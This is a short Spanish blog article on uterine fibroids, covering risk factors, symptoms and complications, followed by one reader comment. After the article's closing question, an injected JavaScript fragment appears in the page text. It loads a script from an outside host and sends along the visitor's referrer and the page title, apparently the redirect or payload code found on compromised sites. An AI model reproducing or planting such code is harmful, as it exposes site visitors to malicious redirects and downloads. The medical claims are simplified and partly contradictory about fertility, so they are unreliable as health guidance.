Salud y belleza » Embarazo, Enfermedades, Salud

Todo sobre los miomas

1 Comentario

Los miomas son tumores benignos que pueden aparecer en el útero de la mujer durante sus años fértiles. Es algo muy frecuente, 3 de cada 4 mujeres los padecen, así que vamos a intentar desvelarte algo más de información acerca de los miomas.

Existen ciertos factores que aumentan las posibilidades de desarrollar estos miomas uterinos. Puede propiciarse por temas genéticos, también por la raza, ya que las mujeres de raza negra son más propensas a tenerlos, y también por la alimentación, ya que quienes consumen más carnes rojas que vegetales o frutas son más vulnerables a los miomas.

miomas-uterinos

Por norma general los miomas no suelen presentar síntomas muy notorios, pero algunas de las mujeres que los padecen pueden sufrir alguno de los siguientes síntomas: ciclo menstrual prolongado, mucho sangrado en la menstruación, dolor pélvico, muchas ganas de orinar y dolor lumbar.

mioma

Aunque los miomas no suponen ningún problema médico grave, lo cierto es que pueden ser incómodos y, en los peores casos, podría derivar en complicaciones más severas, como por ejemplo la anemia. Sin embargo, al contrario de lo que se suele pensar, los miomas no interfieren en la concepción o en el embarazo, pero en algunos casos sí que pueden provocar la infertilidad de la mujer por ese excesivo sangrado.

¿Alguna vez has tenido miomas?

if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

One Comment »

  • paloma said:

    Cómo se hace la prueba de los miomas? yo me obsesiono siempre con todos esos problemas.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.